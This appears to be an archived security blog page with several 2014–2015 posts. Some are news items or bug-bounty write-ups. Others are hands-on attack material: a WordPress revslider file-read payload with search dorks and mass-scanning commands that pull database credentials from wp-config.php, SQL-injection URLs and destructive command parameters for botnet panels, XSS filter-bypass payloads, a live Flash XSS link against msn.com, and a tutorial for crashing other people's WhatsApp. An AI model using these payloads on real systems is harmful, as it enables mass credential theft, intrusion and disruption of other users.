‏إظهار الرسائل ذات التسميات Bug. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات Bug. إظهار كافة الرسائل

الأحد، 1 مارس 2015

Use Jack For ClickJacking Development Assistance Tool

Use Jack For ClickJacking Development Assistance Tool.

Clickjacking POC development tool. Jack is a static HTML and JavaScript web-based tool. To get Jack up and running, serve the index.html file in a manner of your choice and ClickJack away. Be sure to check your browser settings when PoC'ing HTTPS based targets as most browsers will not allow embedding HTTPS resources into iFrames.

Download 

الأربعاء، 25 فبراير 2015

Lenovo Website Is Still Under Construction After Hacked By Lizard Squad


Lenovo Website Is Still Under Construction After Hacked By Lizard Squad.

After the Superfish Malware incident, Lenovo official website is suffering from cyber attack by hacking group called Lizard Squad. It was revealed earlier this week that Lenovo had been pre-installing controversial 'Superfish' adware to its laptops which compromised the computer's encryption certificates to quietly include more ads on Google search.

“We’re breaking free! Soarin’, flyin’, there’s not a star in heaven that we can’t reach!,” Lizard Squad posted on its Twitter page, quoting the song from the movie “High School Musical”.

The hacker group also posted a couple of screenshots of an email between Lenovo employees regarding the “Superfish” software.

On Lenovo website, Company apologies to there visitors with message,

"The Lenovo Web site is currently unavailable but will return soon. To place or check on the status of an order or for any other enquiries, please contact a Lenovo representative during regular business hours."


What is Superfish Adware?
Last friday dozen of Lenovo Laptops are compromised by SSL Spoofing attacks. Where cyber attackers can read HTTPS web traffic to perform the attacks.

You can also do check whether you laptop is compromised by Superfish or not by https://filippo.io/Badfish/. If you see a "YES" then you might have a problem. And if the message output is ,"GOOD, Superfish is probably not intercepting your connections", then you are safe.

About Lenovo:
Lenovo Group Ltd. is a Chinese multinational computer technology company with headquarters in Beijing, China, and Morrisville, North Carolina, United States. Company revenue $38.70 billion at 2014.

الاثنين، 2 فبراير 2015

Exploit - Several Botnet(s) Vulnerabilities

Exploit - Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let's give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability


iBanking
=============

Type: Shell Upload

Sh3ll: *(2)


(18) BotNets are VULNERABLE to SQL Injection:


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now


Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1              
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

blindsqli after you login, pretty useless so i wont bother.


JHTTP
=============

Some sqlinjection vulnerabilities past the assets folder.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:


CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME 

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)


CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


PLASMA
=============

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!


 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


SMSBOT
=============

nothing interesting.


SPY POSCARDSTEALER
=============

nope its secure.

------------------------------------------------------------------------------

If you all find any new Vulnerability, you can directly contact them below!

Contact: asterea@exploit.im                          

Twitter: 4sterea

------------------------------------------------------------------------------

(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class. 
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

الأربعاء، 21 يناير 2015

Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available


Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.

POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.

POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking Panel Wordpress - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel

Source: Inurl

الأحد، 11 يناير 2015

Facebook Vulnerability Allows to Video-Call Mark Zuckerberg!


Facebook Vulnerability Allows to Video-Call Mark Zuckerberg!

Have you ever desired to Video-Call the Founder of Facebook?
Well, with this Vulnerability it's still possible!.

The following used vulnerability allows with a GET (In-URI) CSRF Parameter to avoid the Video-Calling blocks into Mark Zuckerberg Privacy Setting's.

.First let me introduce what a CSRF Vulnerability IS:

"A Cross-Site Request Forgery (CSRF) Vulnerability is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user?s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated." (*)

Now, Let's start analyzing it!
First we start from this URL (like we are actually Video-Calling one of our Friends):

https://www.facebook.com/videocall/incall/

When we've identified the Vulnerable GET Parameter, we may apply it as below!

https://www.facebook.com/videocall/incall/?peer_id=

After the peer_id= parameter, we'll insert Mark Zuckerberg ID (which is id=4)

So, definitely, the Complete URL, will look like this below:

https://www.facebook.com/videocall/incall/?peer_id=4



Regarding this Bug, Facebook Security Team have not yet released a FIX, on the fact continuing to allow Attackers to use this flaw against the whole Social Community!.

Reference: OWASP CSRF Guide
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

السبت، 10 يناير 2015

Facebook Bug - Open Redirection To Blocked Sites

Facebook

Facebook Bug - Open Redirection To Blocked Sites

Link Shim Of Facebook (l.php) 


A very good explanation for 'Link Shim' can be found here. It is a sweet note written by one of the security engineer at Facebook. In short, Facebook tries to protect their users by creating a list of harmless sites and harmful sites. So, sites which are malicious and are marked as `harmful` cannot be used on facebook.

eg. A user cannot post a link of a blocked site.

Try to post `http://ringcloud.com` on Facebook. You won't be allowed and a `warning` message will be displayed saying that `ringcloud.com` is blocked.



Send Dialog


Facebook introduced a 'Send Dialog' long time back. You can find details about it here. It was designed for sending private messages with `links` to one's friends, etc. It can be integrated on third party sites.

Have a look at this
https://www.facebook.com/dialog/send?app_id=145634995501895&link=http://www.pranavhivarekar.in/2014/10/hackerone-bug-redirect-filter-bypass.html&redirect_uri=https://www.google.com

The 'Send Dialog' accepts few parameters.
1. app_id (App needs to be created for using send dialog)
2. link (Link to be shared)
3. redirect_uri (Redirection to site mentioned here after sending message)


After pressing `Send` or `Cancel` user will be redirected to the site mentioned in `redirect_uri`.


Final Exploit 


The values passed to `link` parameter were getting passed through 'Link Shim'. So, attacker is limited to share only those links which are present in `harmless` list of link shim.
eg. Attacker can share any link like `http://pranavhivarekar.in`.

Now, note other `redirect_uri` parameter. I observed that it was not passed through link shim. So. attacker can redirect victims to any site after sending message.
eg. Attacker can redirect users to any site like `http://pranavhivarekar.in`.

So, what is the bug here?
I checked `redirect_uri` parameter against `harmful` list of 'Link Shim' and was really amused and glad to see the redirection to `harmful` site.
eg. I entered `http://ringcloud.com` and after `Sending`message or pressing `Cancel` it redirected me to `http://ringcloud.com`

So, it proves that there were no access controls placed to protect users from redirection to `harmful` sites and it did violate the working of 'Link Shim'. So, this bug was accepted and rewarded by facebook.

Now, if you try to use this exploit then it will show error like this.
eg. Try this --->

https://www.facebook.com/dialog/send?app_id=145634995501895&link=http://www.pranavhivarekar.in&redirect_uri=https://ringcloud.com

It will show you error like.

This bug was rewarded as it affected other users of Facebook and for pointing exactly about the policy of 'Link Shim'.

About The Author:
You can stay in contact with me(Pranav Hivarekar) on Facebook and can follow me on Twitter. Also, you can check my blog (http://pranavhivarekar.in) for new findings.
Thanks for spending time to read this ...! Comments are welcome. :-)

الأربعاء، 31 ديسمبر 2014

How Can We Bypass HTMLEntities Tutorial


How Can We Bypass HTMLEntities Tutorial ?

The Security researcher Paulos Yibelo share with HOC that how he bypassing htmlentities().

Well I don’t know how to break it down for you, you just can’t (if the function is used properly and exactly where it should). But it’s more probable that most developers don’t use it the right way, since it’s like a norm for some developers to not use built-in functions properly :P. So I will talk about some of the cases I came up while pentesting. htmlentities() and htmlspecailchars() are functions mainly developed to filter out cross site scripting attacks.

But I can promise you that you can build a better function if your user input is massive since that’s when most exploitation scenarios begin. How? Well, the functions html entity the characters < , > “ and ‘. So without those there seems there is no XSS. Or isn’t really? Well, I can think of one. Something like javascript:alert(1); will be executed since none of the characters in it are filtered to be html entityed… but there is a limitation to this. Without using “> or any similar technique we will not be able to break out of the attribute we are inside.

Also the value attribute in html is not vulnerable since it only accepts strings and well we need scripts that can execute… something like href, onclick would do… but who would put such a foolish mistake right? Well you wouldn’t believe if I told you even big companies like Facebook does.
Have a code like?
print '<img src="'.htmlentities("$url").”';
or even
                print "<a href='".htmlentities($url)."'>Click Here</a>";

“javascript:alert(1);” will bypass it because it doesn’t contain the characters that will be filtered. But notice a limitation here? Our code will only execute if user clicks the Click Here button. So that’s a huge limitation. Or is it? The html code will become something like

<a href='javascript:alert(1);'>Click Here</a>

But we need to break out of the href tag and execute a more malicious javascript. But how? If we try to break out of it using ‘> it won’t work since both those characters are filtered out… and the code will become something like

<a href='javascript:alert(1);&quot;&gt;'>Click Here</a>

Right? Well not exactly. Htmlentities comes with single quote ( ‘ ) not filtered by default and you have to specify a special switch called ENT_QUOTES to declare that. So the real output when values like “javascript:alert(1);’>” is given

<a href='javascript:alert(1);'&gt;'>Click Here</a>

A hope! We broke out of the attribute so giving values like

javascript:alert(1);’ onfocus=alert(1); autofocus

will output html source like

<a href='javascript:alert(1);' onfocus=alert(1); autofocus>Click Here</a>

So wow… our final payload to bypass the filter would look something like

paulos’ onfocus=alert(0); autofocus

Would successfully bypass the function htmlentities and prints out the source of

<a href='paulos' onfocus=alert(0) autofocus>Click Here</a>

Successful explotation of the function htmlentities.  so why not use the switch to enable the single quote (‘) and make our code secured. something like

 print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";

Well now, we may can’t break out of the cage we are inside but still can execute JavaScript in the attribute we are inside. However, the value html attribute is off limits. we cannot execute JavaScript inside it. But when you find code like:

print "<input type='text' value=".htmlentities("$value").">";

even when using ENT_QUOTES, this is when value attribute becomes vulnerable.

paulos onmouseover=alert(1);

 will successfully bypass the value parameter and make html code like

<input type='text' value=paulos onmouseover=alert(1);>
Cool.

So not using quotes got us vulnerable, we will just use quotes then. Well I recommend not using single quotes… that’s when your code nearly becomes vulnerable when you forgot to use  the switch ENT_QUOTES, which you probably will.

But this isn’t just it… attackers can still attack your application using a different character set called UTF-7 even when you are using proper usage of htmlentities, so unless you protect your code by setting your charset to UTF-8 or any other charset other that 7, you are still vulnerable to XSS.

About The Author:
Paulos Yibelo, 17 years, a computer geek. He is a web-application security researcher and developer. He gets Acknowledgements and Rewards from big companies like Facebook, Microsoft, SoundCloud, AT&T, AVG and more companies.

الاثنين، 15 ديسمبر 2014

MSN.COM Affected By Multiple Flash Cross-Site Scripting Vulnerabilities


MSN.COM Affected By Multiple Flash Cross-Site Scripting Vulnerabilities!

Basically a Flash Cross-Site Scripting Vulnerability isn't so different from the other XSS Attacks and infect they have the same High Impact like the others! but the unique difference is that it works via Flash Object Files (.SWF).

Christian Galeone a youngest cyber security researcher has been found vulnerability in Microsoft domain. He describe as follows:

Into my Bug Hunting Carrier i had the opportunity to find Several High Issues, one of them is the Flash Cross Site Scripting Vulnerability!.

So, here is how it works!:



For these reasons, i have Recently found that the domain " ads1.msn.com " from Microsoft Inc. had Several Vulnerable Flash Objects for this type of Attack!

**Affected URL(s) Link:**

http://ads1.msn.com/ads/7188/0000007188_000000000000000633582.swf

http://ads1.msn.com/ads/76434/0000076434_000000000000000600751.swf

http://ads1.msn.com/ads/83264/0000083264_000000000000000674697.swf

http://ads1.msn.com/ads/60380/0000060380_000000000000000471735.swf

http://ads1.msn.com/ads/73102/0000073102_000000000000000411337.swf

http://ads1.msn.com/ads/68526/0000068526_000000000000000626606.swf

http://ads1.msn.com/ads/76434/0000076434_000000000000000600754.swf

http://ads1.msn.com/ads/53428/0000053428_000000000000000567342.swf

http://ads1.msn.com/ads/9911/0000009911_000000000000000610871.swf

http://ads1.msn.com/ads/65522/0000065522_000000000000000526160.swf

I have downloaded the SWF Object(s) and analyzed their Internal Code with SWFScan (from HP), here you can see the code:


As i saw, the ?ClickTag= Parameter was Vulnerable (after have tested it manually) and so i was able to Inject the PoC Payload Script into it, as you can see below,

Javascript:prompt(document.domain)//

The document.domain indicate where the Script Execution will come from, so the PoC Link will look as below:

http://ads1.msn.com/ads/7188/0000007188_000000000000000633582.swf?clickTAG=Javascript:prompt(document.domain)//

Let's see the main SWF Screen


This is our Result - (Click into the Banner)!



Where about:blank it indicates the Origin of the Script, in our Case the 0000007188_000000000000000633582.swf Object!.

I've then reported the issue to Microsoft Security Team and they decided to Credit me into their Acknowledgement Page for the month of January 2015!




Let's say is an awesome Gift ;-)
Marry Christmas and Happy New Year to Everybody!!

More Details:
http://www.acunetix.com/blog/articles/elaborate-ways-exploit-xss-flash-parameter-injection/

About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.
He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

الثلاثاء، 9 ديسمبر 2014

NoGoToFail: A Network Security Testing Tool For HTTPS And TLS/SSL Bugs


NoGoToFail: A Network Security Testing Tool For HTTPS and TLS/SSL Bugs. An on-path blackbox network traffic security testing tool.

Nogotofail is a network security testing tool designed to help developers and security researchers spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and applications in a flexible, scalable, powerful way. It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.

Design

Nogotofail is composed of an on-path network MiTM and optional clients for the devices being tested. See docs/design.md for the overview and design goals of nogotofail.

Dependencies

Nogotofail depends only on Python 2.7 and pyOpenSSL>=0.13. The MiTM is designed to work on Linux machines and the transparent traffic capture modes are Linux specific and require iptables as well.

Additionally the Linux client depends on psutil.

According to Google blog,
"Google is committed to increasing the use of TLS/SSL in all applications and services. But “HTTPS everywhere” is not enough; it also needs to be used correctly. Most platforms and devices have secure defaults, but some applications and libraries override the defaults for the worse, and in some instances we’ve seen platforms make mistakes as well. As applications get more complex, connect to more services, and use more third party libraries, it becomes easier to introduce these types of mistakes.

The Android Security Team has built a tool, called nogotofail, that provides an easy way to confirm that the devices or applications you are using are safe against known TLS/SSL vulnerabilities and misconfigurations. Nogotofail works for Android, iOS, Linux, Windows, Chrome OS, OSX, in fact any device you use to connect to the Internet. There’s an easy-to-use client to configure the settings and get notifications on Android and Linux, as well as the attack engine itself which can be deployed as a router, VPN server, or proxy."

Download

الأربعاء، 3 ديسمبر 2014

Crash Your Friend WhatsApp Account Remotely [TUTORIAL]


Crash Your Friend WhatsApp Account Remotely [TUTORIAL]

Recently published a report here on the blog a new flaw found in WhatsApp, where you can catch Application on the phone of another person by sending a message 2KB, made up of characters that the app can not decipher.

The process is simple:

1 - Through its cellular visit the link Pastebin containing the characters
http://pastebin.com/3efiBva4


2 - Select all characters, copy, select a conversation and paste. It could be a private conversation or in a group.


3 - Message sent, now only await the outcome.


Link with message 2 KB in Pastebin: http://pastebin.com/3efiBva4
When the reader will click on message, then WhatsApp will be crashed.

Note: The responsibility is yours to crash private groups or conversations.

Thanks to my friend Juliana for the help.